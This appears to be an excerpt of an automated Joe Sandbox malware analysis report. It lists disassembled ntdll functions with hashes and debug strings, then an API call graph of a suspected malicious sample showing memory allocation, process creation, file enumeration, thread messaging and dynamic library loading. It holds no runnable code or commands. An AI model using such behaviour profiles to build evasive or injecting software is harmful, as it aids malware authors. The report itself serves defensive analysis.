                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: c3922fd54142b87ff5f0664b28db6d6616939ee2c9fb4445f880275ba4e25218
                                                • Instruction ID: 15a7ea1cbb722eaec51093e49c44523ed576f8355280f295b89cbde30be54ad5
                                                • Opcode Fuzzy Hash: c3922fd54142b87ff5f0664b28db6d6616939ee2c9fb4445f880275ba4e25218
                                                • Instruction Fuzzy Hash: 3551E571A00645AECB24DF5DCAD09BFB7FDEB44201B04886DE59AD7641E6B8FA40C760
                                                Function 01937630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01974725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01974742
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01974655
                                                • ExecuteOptions, xrefs: 019746A0
                                                • Execute=1, xrefs: 01974713
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019746FC
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01974787
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: b064bf9ace0beb66754624c1e93756ecd5aeff065fca907c10736328af944361
                                                • Instruction ID: a7a76a1a21fbacdedb3476d4d9d57d2fd5e9117b8b19c8bcafa9266c7fafd178
                                                • Opcode Fuzzy Hash: b064bf9ace0beb66754624c1e93756ecd5aeff065fca907c10736328af944361
                                                • Instruction Fuzzy Hash: D05148B160020A7BEF25ABE8DC99FA977ACEF94304F0404ADD60DA7181E7719E41CF51
                                                Function 019D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction ID: 585d9d3cba44b55fe2ea599f47196abd6173923c3c4e7f6f6b4e312c68ca14c6
                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                • Instruction Fuzzy Hash: 48020671508342AFD309CF68C890E6BBBE5EFC8704F44892DFA894B264DB31E945CB52
                                                Function 0194B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction ID: 37fbafaa788e5c74d8bec91fba89c4c8d35ba7724ea30e2ed54883f57aafd99f
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: EE81BF70E052499FEF29CF6CC891FFEBBAAAF45321F184619D85AA7691C634C8408B51
                                                Function 019B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: b03fdd17cdb47544054353589cd4056fe33cd3f67a2a2ba4fea771c41250db4f
                                                • Instruction ID: cc570b671901f6e2576de6cfd202457c2a1141a0ad32bb6c95d4732d59fc6464
                                                • Opcode Fuzzy Hash: b03fdd17cdb47544054353589cd4056fe33cd3f67a2a2ba4fea771c41250db4f
                                                • Instruction Fuzzy Hash: 8721367AE00119ABDB11DF79D984AEE7BECFF54655F440119EE19E3200E730A9028B91
                                                Function 0192F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019702E7
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019702BD
                                                • RTL: Re-Waiting, xrefs: 0197031E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 121007ba77a96a57a78ee1355a7ba7a2ff99cfa88cde5b58d851584931af746e
                                                • Instruction ID: d0ded7e313bf55e38ebb3f99d142cb4dbaf2a82d7eb92724c26e667fd619f20b
                                                • Opcode Fuzzy Hash: 121007ba77a96a57a78ee1355a7ba7a2ff99cfa88cde5b58d851584931af746e
                                                • Instruction Fuzzy Hash: B2E18B316087529FD725CF28C884B2ABBF4BF85724F180A6DF5A98B2E1D774D944CB42
                                                Function 0193BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 01977B8E
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01977B7F
                                                • RTL: Re-Waiting, xrefs: 01977BAC
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 1e57129213f583279cd31eada5dadf4750eb68e10c7797be6ca3ce03a14a5d15
                                                • Instruction ID: 975fac604d88caf936de7e206e015c0c43051ec16227ddef2b89f35e01746ec1
                                                • Opcode Fuzzy Hash: 1e57129213f583279cd31eada5dadf4750eb68e10c7797be6ca3ce03a14a5d15
                                                • Instruction Fuzzy Hash: 7541C1313007029FD724EE29C840F6AB7E9EFD9721F100A1DEA5EDB680DB31E9058B91
                                                Function 0193B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 019772A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01977294
                                                • RTL: Re-Waiting, xrefs: 019772C1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: c4e8858824973f5583e2b91cf1f38303fdd5629afa8b678b107088d9372f4dc0
                                                • Instruction ID: 93d9eaf0b775e44cc0b89e7a3dd785837098b8883832a39091f8d32e8645afa4
                                                • Opcode Fuzzy Hash: c4e8858824973f5583e2b91cf1f38303fdd5629afa8b678b107088d9372f4dc0
                                                • Instruction Fuzzy Hash: F6410231700206ABD724DE69CC45F6AB7A5FF95B21F100A19F96EEB280DB21E812C7D1
                                                Function 019B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 9b02d800b1511fe0a3af234af25fc0f418314d3ac14a2b07810cf058d42427dd
                                                • Instruction ID: dc3e82e5e0d1c5d895040124aba8a360587e1ed1e1d082fd7f118678f5d88f00
                                                • Opcode Fuzzy Hash: 9b02d800b1511fe0a3af234af25fc0f418314d3ac14a2b07810cf058d42427dd
                                                • Instruction Fuzzy Hash: A5316676A012199FDB60DF2DCD80BEE77FCEB54611F444559E94DE3240EB30AA458BA0
                                                Function 01947D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction ID: 908bf257302396b3218af323367e089a7dab914124c348ee519f6e6f8b7ec30f
                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                • Instruction Fuzzy Hash: E791C571E0020E9BDB38DFEDC880EBEBBA9EF44321F54465AE95DA72D0D73099408711
                                                Function 01909126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_18d0000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 326cbc29bf33c91e2d6c901017a36c17e770e982106ae82f5592467f72ec1106
                                                • Instruction ID: db3e46eaa13f994af1efb39de2915da75427ef74825184b57f5600adb04a0cf8
                                                • Opcode Fuzzy Hash: 326cbc29bf33c91e2d6c901017a36c17e770e982106ae82f5592467f72ec1106
                                                • Instruction Fuzzy Hash: C281F971D012699FDB35DB54CC44BEAB6B8AB48754F0045EAAA1DB7280D7709E84CFA0

                                                Execution Graph

                                                Execution Coverage:2.5%
                                                Dynamic/Decrypted Code Coverage:4.2%
                                                Signature Coverage:1.5%
                                                Total number of Nodes:453
                                                Total number of Limit Nodes:72
                                                execution_graph 99724 309b380 99726 309c9f1 99724->99726 99727 30bacd0 99724->99727 99730 30b8df0 99727->99730 99729 30bad01 99729->99726 99731 30b8e82 99730->99731 99733 30b8e18 99730->99733 99732 30b8e98 NtAllocateVirtualMemory 99731->99732 99732->99729 99733->99729 99734 30b8980 99735 30b8a34 99734->99735 99737 30b89ac 99734->99737 99736 30b8a4a NtCreateFile 99735->99736 99738 30bbec0 99741 30bad60 99738->99741 99744 30b9000 99741->99744 99743 30bad79 99745 30b901d 99744->99745 99746 30b902e RtlFreeHeap 99745->99746 99746->99743 99747 30a1710 99752 30b82c0 99747->99752 99751 30a175b 99753 30b82da 99752->99753 99761 38d2c0a 99753->99761 99754 30a1746 99756 30b8d20 99754->99756 99757 30b8dac 99756->99757 99759 30b8d48 99756->99759 99764 38d2e80 LdrInitializeThunk 99757->99764 99758 30b8ddd 99758->99751 99759->99751 99762 38d2c1f LdrInitializeThunk 99761->99762 99763 38d2c11 99761->99763 99762->99754 99763->99754 99764->99758 99765 30aff50 99766 30aff6d 99765->99766 99771 30a47a0 99766->99771 99768 30aff8b 99770 30b0115 99768->99770 99778 30b67a0 99768->99778 99773 30a47c4 99771->99773 99772 30a47cb 99772->99768 99773->99772 99774 30a47ea 99773->99774 99783 30bc240 LdrLoadDll 99773->99783 99776 30a4800 LdrLoadDll 99774->99776 99777 30a4817 99774->99777 99776->99777 99777->99768 99779 30b6805 99778->99779 99780 30b6838 99779->99780 99784 30b023d RtlFreeHeap 99779->99784 99780->99770 99782 30b681a 99782->99770 99783->99774 99784->99782 99785 30ac410 99787 30ac439 99785->99787 99786 30ac53d 99787->99786 99788 30ac4e3 FindFirstFileW 99787->99788 99788->99786 99791 30ac4fe 99788->99791 99789 30ac524 FindNextFileW 99790 30ac536 FindClose 99789->99790 99789->99791 99790->99786 99791->99789 99792 30af650 99793 30af6b4 99792->99793 99823 30a6180 99793->99823 99795 30af7ee 99796 30af7e7 99796->99795 99830 30a6290 99796->99830 99799 30af993 99800 30b67a0 RtlFreeHeap 99801 30af88e 99800->99801 99802 30af9a2 99801->99802 99834 30af430 99801->99834 99803 30b8c80 NtClose 99802->99803 99805 30af9ac 99803->99805 99806 30af8a6 99806->99802 99807 30af8b1 99806->99807 99843 30bae40 99807->99843 99809 30af8da 99810 30af8f9 99809->99810 99811 30af8e3 99809->99811 99846 30af320 CoInitialize 99810->99846 99812 30b8c80 NtClose 99811->99812 99814 30af8ed 99812->99814 99815 30af907 99848 30b8740 99815->99848 99817 30af982 99852 30b8c80 99817->99852 99819 30af98c 99820 30bad60 RtlFreeHeap 99819->99820 99820->99799 99821 30af925 99821->99817 99822 30b8740 LdrInitializeThunk 99821->99822 99822->99821 99824 30a61b3 99823->99824 99825 30a61d7 99824->99825 99855 30b87e0 99824->99855 99825->99796 99827 30a61fa 99827->99825 99828 30b8c80 NtClose 99827->99828 99829 30a627a 99828->99829 99829->99796 99831 30a62b5 99830->99831 99860 30b85d0 99831->99860 99835 30af44c 99834->99835 99836 30a47a0 2 API calls 99835->99836 99838 30af46a 99836->99838 99837 30af473 99837->99806 99838->99837 99839 30a47a0 2 API calls 99838->99839 99840 30af53e 99839->99840 99841 30a47a0 2 API calls 99840->99841 99842 30af59b 99840->99842 99841->99842 99842->99806 99865 30b8fb0 99843->99865 99845 30bae5b 99845->99809 99847 30af385 99846->99847 99847->99815 99849 30b875a 99848->99849 99868 38d2ba0 LdrInitializeThunk 99849->99868 99850 30b878a 99850->99821 99853 30b8c9a 99852->99853 99854 30b8cab NtClose 99853->99854 99854->99819 99856 30b87fa 99855->99856 99859 38d2ca0 LdrInitializeThunk 99856->99859 99857 30b8826 99857->99827 99859->99857 99861 30b85ed 99860->99861 99864 38d2c60 LdrInitializeThunk 99861->99864 99862 30a6329 99862->99799 99862->99800 99864->99862 99866 30b8fca 99865->99866 99867 30b8fdb RtlAllocateHeap 99866->99867 99867->99845 99868->99850 99869 30a6c50 99870 30a6c7a 99869->99870 99873 30a7d80 99870->99873 99872 30a6ca4 99874 30a7d9d 99873->99874 99880 30b83b0 99874->99880 99876 30a7ded 99877 30a7df4 99876->99877 99885 30b8490 99876->99885 99877->99872 99879 30a7e1d 99879->99872 99881 30b844b 99880->99881 99882 30b83db 99880->99882 99890 38d2f30 LdrInitializeThunk 99881->99890 99882->99876 99883 30b8484 99883->99876 99886 30b84bc 99885->99886 99887 30b853e 99885->99887 99886->99879 99891 38d2d10 LdrInitializeThunk 99887->99891 99888 30b8583 99888->99879 99890->99883 99891->99888 99907 38d2ad0 LdrInitializeThunk 99908 3099b16 99910 3099ad2 99908->99910 99914 3099b20 99908->99914 99909 3099b10 99910->99909 99911 3099afd CreateThread 99910->99911 99912 309a190 99914->99912 99915 30ba9c0 99914->99915 99916 30ba9e6 99915->99916 99921 30940b0 99916->99921 99918 30ba9f2 99919 30baa2b 99918->99919 99924 30b4f00 99918->99924 99919->99912 99923 30940bd 99921->99923 99928 30a3470 99921->99928 99923->99918 99925 30b4f61 99924->99925 99927 30b4f6e 99925->99927 99939 30a1830 99925->99939 99927->99919 99929 30a348a 99928->99929 99931 30a34a3 99929->99931 99932 30b96f0 99929->99932 99931->99923 99934 30b970a 99932->99934 99933 30b9739 99933->99931 99934->99933 99935 30b82c0 LdrInitializeThunk 99934->99935 99936 30b9799 99935->99936 99937 30bad60 RtlFreeHeap 99936->99937 99938 30b97b2 99937->99938 99938->99931 99940 30a1868 99939->99940 99955 30a7ce0 99940->99955 99942 30a1870 99943 30a1b53 99942->99943 99944 30bae40 RtlAllocateHeap 99942->99944 99943->99927 99945 30a1886 99944->99945 99946 30bae40 RtlAllocateHeap 99945->99946 99947 30a1897 99946->99947 99948 30bae40 RtlAllocateHeap 99947->99948 99949 30a18a8 99948->99949 99954 30a1945 99949->99954 99970 30a68e0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99949->99970 99951 30a47a0 2 API calls 99952 30a1b02 99951->99952 99966 30b7840 99952->99966 99954->99951 99956 30a7d0c 99955->99956 99971 30a7bd0 99956->99971 99959 30a7d39 99961 30a7d44 99959->99961 99963 30b8c80 NtClose 99959->99963 99960 30a7d51 99962 30a7d6d 99960->99962 99964 30b8c80 NtClose 99960->99964 99961->99942 99962->99942 99963->99961 99965 30a7d63 99964->99965 99965->99942 99967 30b78a2 99966->99967 99968 30b78af 99967->99968 99982 30a1b70 99967->99982 99968->99943 99970->99954 99972 30a7cc6 99971->99972 99973 30a7bea 99971->99973 99972->99959 99972->99960 99977 30b8360 99973->99977 99976 30b8c80 NtClose 99976->99972 99978 30b837d 99977->99978 99981 38d35c0 LdrInitializeThunk 99978->99981 99979 30a7cba 99979->99976 99981->99979 99983 30a1b91 99982->99983 99984 30a1bb3 SetErrorMode 99983->99984 99986 30a1bba 99983->99986 99984->99986 99985 30a2116 99985->99968 99986->99985 99999 30b0f60 99986->99999 99989 30a1dcf 100007 30bbf90 99989->100007 99990 30a1c13 99990->99985 100002 30bbe60 99990->100002 99993 30a1de4 99995 30a1e30 99993->99995 100013 30a0670 99993->100013 99995->99985 99997 30a0670 LdrInitializeThunk 99995->99997 100016 30a7f50 99995->100016 99996 30a7f50 LdrInitializeThunk 99998 30a1f87 99996->99998 99997->99995 99998->99995 99998->99996 100000 30bacd0 NtAllocateVirtualMemory 99999->100000 100001 30b0f81 99999->100001 100000->100001 100001->99990 100003 30bbe70 100002->100003 100004 30bbe76 100002->100004 100003->99989 100005 30bae40 RtlAllocateHeap 100004->100005 100006 30bbe9c 100005->100006 100006->99989 100008 30bbf00 100007->100008 100009 30bae40 RtlAllocateHeap 100008->100009 100011 30bbf5d 100008->100011 100010 30bbf3a 100009->100010 100012 30bad60 RtlFreeHeap 100010->100012 100011->99993 100012->100011 100014 30a0692 100013->100014 100020 30b8f10 100013->100020 100014->99998 100017 30a7f63 100016->100017 100025 30b81c0 100017->100025 100019 30a7f8e 100019->99995 100021 30b8f2d 100020->100021 100024 38d2c70 LdrInitializeThunk 100021->100024 100022 30b8f55 100022->100014 100024->100022 100026 30b823e 100025->100026 100027 30b81eb 100025->100027 100030 38d2dd0 LdrInitializeThunk 100026->100030 100027->100019 100028 30b8263 100028->100019 100030->100028 100031 30a5ae9 100032 30a5a73 100031->100032 100033 30a5aee 100032->100033 100034 30a7f50 LdrInitializeThunk 100032->100034 100035 30a5a90 100034->100035 100037 30a5abc 100035->100037 100038 30a7ed0 100035->100038 100039 30a7f14 100038->100039 100044 30a7f35 100039->100044 100045 30b7f90 100039->100045 100041 30a7f25 100042 30a7f41 100041->100042 100043 30b8c80 NtClose 100041->100043 100042->100035 100043->100044 100044->100035 100046 30b800d 100045->100046 100047 30b7fbb 100045->100047 100050 38d4650 LdrInitializeThunk 100046->100050 100047->100041 100048 30b8032 100048->100041 100050->100048 100051 30a29ef 100052 30a6180 2 API calls 100051->100052 100053 30a2a0d 100052->100053 100054 30b1121 100066 30b8af0 100054->100066 100056 30b1142 100057 30b1160 100056->100057 100058 30b1175 100056->100058 100060 30b8c80 NtClose 100057->100060 100059 30b8c80 NtClose 100058->100059 100063 30b117e 100059->100063 100061 30b1169 100060->100061 100062 30b11b5 100063->100062 100064 30bad60 RtlFreeHeap 100063->100064 100065 30b11a9 100064->100065 100067 30b8b94 100066->100067 100069 30b8b18 100066->100069 100068 30b8baa NtReadFile 100067->100068 100068->100056 100069->100056 100070 30a0be0 100071 30a0bed 100070->100071 100072 30a47a0 2 API calls 100071->100072 100073 30a0c18 100072->100073 100074 30a0c5d 100073->100074 100075 30a0c4c PostThreadMessageW 100073->100075 100075->100074 100076 30b15a0 100077 30b15bc 100076->100077 100078 30b15f8 100077->100078 100079 30b15e4 100077->100079 100080 30b8c80 NtClose 100078->100080 100081 30b8c80 NtClose 100079->100081 100083 30b1601 100080->100083 100082 30b15ed 100081->100082 100086 30bae80 RtlAllocateHeap 100083->100086 100085 30b160c 100086->100085 100087 30b8be0 100088 30b8c57 100087->100088 100090 30b8c0b 100087->100090 100089 30b8c6d NtDeleteFile 100088->100089 100091 30b50e0 100092 30b5142 100091->100092 100094 30b514f 100092->100094 100095 30a72a0 100092->100095 100096 30a7247 100095->100096 100097 30a7292 100096->100097 100099 30ab0a0 100096->100099 100097->100094 100100 30ab0c6 100099->100100 100101 30ab2f3 100100->100101 100128 30b9090 100100->100128 100101->100097 100103 30ab13c 100103->100101 100104 30bbf90 2 API calls 100103->100104 100105 30ab15b 100104->100105 100105->100101 100106 30ab22f 100105->100106 100107 30b82c0 LdrInitializeThunk 100105->100107 100108 30ab24e 100106->100108 100110 30a59e0 LdrInitializeThunk 100106->100110 100109 30ab1bd 100107->100109 100134 30b5030 100108->100134 100109->100106 100113 30ab1c6 100109->100113 100110->100108 100112 30ab278 100114 30ab2db 100112->100114 100139 30b7e30 100112->100139 100113->100101 100116 30ab1f8 100113->100116 100122 30ab217 100113->100122 100131 30a59e0 100113->100131 100120 30a7f50 LdrInitializeThunk 100114->100120 100115 30a7f50 LdrInitializeThunk 100119 30ab225 100115->100119 100154 30b4080 LdrInitializeThunk 100116->100154 100119->100097 100124 30ab2e9 100120->100124 100122->100115 100123 30ab2b2 100144 30b7ee0 100123->100144 100124->100097 100126 30ab2cc 100149 30b8040 100126->100149 100129 30b90aa 100128->100129 100130 30b90bb CreateProcessInternalW 100129->100130 100130->100103 100132 30a5a1e 100131->100132 100133 30b8490 LdrInitializeThunk 100131->100133 100132->100116 100133->100132 100135 30b5095 100134->100135 100136 30b50d0 100135->100136 100155 30a57b0 100135->100155 100136->100112 100138 30b50b2 100138->100112 100140 30b7eaa 100139->100140 100141 30b7e58 100139->100141 100160 38d39b0 LdrInitializeThunk 100140->100160 100141->100123 100142 30b7ecf 100142->100123 100145 30b7f5d 100144->100145 100147 30b7f0b 100144->100147 100161 38d4340 LdrInitializeThunk 100145->100161 100146 30b7f82 100146->100126 100147->100126 100150 30b80bd 100149->100150 100152 30b806b 100149->100152 100162 38d2fb0 LdrInitializeThunk 100150->100162 100151 30b80e2 100151->100114 100152->100114 100154->100122 100156 30a57be 100155->100156 100157 30a592a 100156->100157 100158 30b8490 LdrInitializeThunk 100156->100158 100157->100138 100159 30a5a1e 100158->100159 100159->100138 100160->100142 100161->100146 100162->100151 100165 30a3373 100166 30a7bd0 2 API calls 100165->100166 100167 30a3383 100166->100167 100168 30a339f 100167->100168 100169 30b8c80 NtClose 100167->100169 100169->100168 100170 30aab70 100175 30aa880 100170->100175 100172 30aab7d 100189 30aa4f0 100172->100189 100174 30aab99 100176 30aa8a5 100175->100176 100200 30a8180 100176->100200 100179 30aa9f3 100179->100172 100181 30aaa0a 100181->100172 100182 30aaa01 100182->100181 100184 30aaaf7 100182->100184 100219 30a9f40 100182->100219 100186 30aab5a 100184->100186 100228 30aa2b0 100184->100228 100187 30bad60 RtlFreeHeap 100186->100187 100188 30aab61 100187->100188 100188->100172 100190 30aa506 100189->100190 100193 30aa511 100189->100193 100191 30bae40 RtlAllocateHeap 100190->100191 100191->100193 100192 30aa538 100192->100174 100193->100192 100194 30a8180 GetFileAttributesW 100193->100194 100195 30aa852 100193->100195 100198 30a9f40 RtlFreeHeap 100193->100198 100199 30aa2b0 RtlFreeHeap 100193->100199 100194->100193 100196 30aa86b 100195->100196 100197 30bad60 RtlFreeHeap 100195->100197 100196->100174 100197->100196 100198->100193 100199->100193 100201 30a81a1 100200->100201 100202 30a81a8 GetFileAttributesW 100201->100202 100203 30a81b3 100201->100203 100202->100203 100203->100179 100204 30b2c50 100203->100204 100205 30b2c5e 100204->100205 100206 30b2c65 100204->100206 100205->100182 100207 30a47a0 2 API calls 100206->100207 100208 30b2c9a 100207->100208 100209 30b2ca9 100208->100209 100232 30b2710 LdrLoadDll LdrLoadDll 100208->100232 100210 30bae40 RtlAllocateHeap 100209->100210 100215 30b2e57 100209->100215 100212 30b2cc2 100210->100212 100213 30b2e4d 100212->100213 100212->100215 100216 30b2cde 100212->100216 100214 30bad60 RtlFreeHeap 100213->100214 100213->100215 100214->100215 100215->100182 100216->100215 100217 30bad60 RtlFreeHeap 100216->100217 100218 30b2e41 100217->100218 100218->100182 100220 30a9f66 100219->100220 100233 30ad980 100220->100233 100222 30a9fd8 100224 30aa160 100222->100224 100225 30a9ff6 100222->100225 100223 30aa145 100223->100182 100224->100223 100226 30a9e00 RtlFreeHeap 100224->100226 100225->100223 100238 30a9e00 100225->100238 100226->100224 100229 30aa2d6 100228->100229 100230 30ad980 RtlFreeHeap 100229->100230 100231 30aa35d 100230->100231 100231->100184 100232->100209 100235 30ad987 100233->100235 100234 30ad9b1 100234->100222 100235->100234 100236 30bad60 RtlFreeHeap 100235->100236 100237 30ad9f4 100236->100237 100237->100222 100239 30a9e1d 100238->100239 100242 30ada10 100239->100242 100241 30a9f23 100241->100225 100243 30ada34 100242->100243 100244 30adade 100243->100244 100245 30bad60 RtlFreeHeap 100243->100245 100244->100241 100245->100244 100246 30a9a30 100247 30a9a3f 100246->100247 100248 30a9a46 100247->100248 100249 30bad60 RtlFreeHeap 100247->100249 100249->100248 100250 30b1930 100251 30b1949 100250->100251 100252 30b1994 100251->100252 100255 30b19d4 100251->100255 100257 30b19d9 100251->100257 100253 30bad60 RtlFreeHeap 100252->100253 100254 30b19a4 100253->100254 100256 30bad60 RtlFreeHeap 100255->100256 100256->100257 100258 30b5970 100259 30b59ca 100258->100259 100261 30b59d7 100259->100261 100262 30b3380 100259->100262 100263 30bacd0 NtAllocateVirtualMemory 100262->100263 100264 30b33c1 100263->100264 100265 30a47a0 2 API calls 100264->100265 100267 30b34ce 100264->100267 100268 30b3407 100265->100268 100266 30b3450 Sleep 100266->100268 100267->100261 100268->100266 100268->100267 100269 30b8270 100270 30b828d 100269->100270 100273 38d2df0 LdrInitializeThunk 100270->100273 100271 30b82b5 100273->100271 100274 30b80f0 100275 30b811b 100274->100275 100276 30b817f 100274->100276 100279 38d2ee0 LdrInitializeThunk 100276->100279 100277 30b81b0 100279->100277 100281 30a8637 100283 30a863a 100281->100283 100282 30a85f1 100283->100282 100285 30a6e70 LdrInitializeThunk LdrInitializeThunk 100283->100285 100285->100282

                                                Executed Functions

                                                Function 03099B20 Relevance: 29.1, Strings: 23, Instructions: 313COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
